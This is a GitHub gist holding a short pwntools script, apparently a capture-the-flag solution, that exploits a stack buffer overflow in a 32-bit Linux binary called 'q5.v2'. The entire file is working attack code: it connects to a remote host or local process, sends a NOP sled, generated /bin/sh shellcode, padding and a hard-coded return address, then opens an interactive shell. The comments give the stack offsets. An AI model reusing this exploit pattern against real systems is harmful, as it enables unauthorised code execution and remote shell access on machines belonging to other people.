Created
October 10, 2016 19:54
-
-
Save Manouchehri/2b8a06065a5960a836772a5770a2cb06 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| #Setup context | |
| context(arch='i386', os='linux') | |
| context.log_level = 'debug' | |
| #Open connection to the process | |
| #Remote | |
| sock = remote(<host>, <port>) | |
| #Local | |
| # sock = process('./q5.v2') | |
| # pid = pwnlib.util.proc.pidof(sock) | |
| # print pid[0] | |
| # pwnlib.util.proc.wait_for_debugger(pid[0]) | |
| #ignore some lines | |
| sock.recvline() | |
| sock.recvline() | |
| print "Sending shellcode" | |
| #EBP is at 0xffffd318 so we want to return to somewhere around 0xffffd2ce +- 40 (where the buffer starts) | |
| #The flaw should looks omething like this: 74 bytes of data, 4 bytes for ebp pointer of previous stack frame and finally the next 4 bytes will be the retrun address | |
| #send shell code: [n-bytes NOP sled][i-bytes of shell code][k-bytes of data (minimum of 4)][4 bytes return address] | |
| #Attempt to have ctftools build us the shell code to use -- should be 82 bytes long | |
| nop_sled = "\x90" * 40 | |
| payload = asm(shellcraft.i386.linux.sh()) | |
| data = "\x00" * 16 | |
| ret_address = "\xe2\xd2\xff\xff" | |
| exploit = nop_sled + payload + data + ret_address | |
| print "Exploit length", len(payload) | |
| #Send the exploit | |
| sock.send(exploit) | |
| #prompt for interactive shell | |
| sock.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment